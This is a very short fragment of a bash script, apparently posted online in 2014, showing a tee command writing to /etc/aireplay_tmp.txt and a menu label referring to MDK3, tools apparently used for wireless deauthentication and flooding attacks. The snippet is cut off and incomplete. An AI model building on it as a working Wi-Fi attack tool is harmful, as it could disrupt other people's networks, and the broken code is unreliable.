tee /etc/aireplay_tmp.txt > /dev/null; done } ########################################################################### MDK3_MAIN_MENU
Posted on: Sun, 07 Dec 2014 17:30:18 +0000

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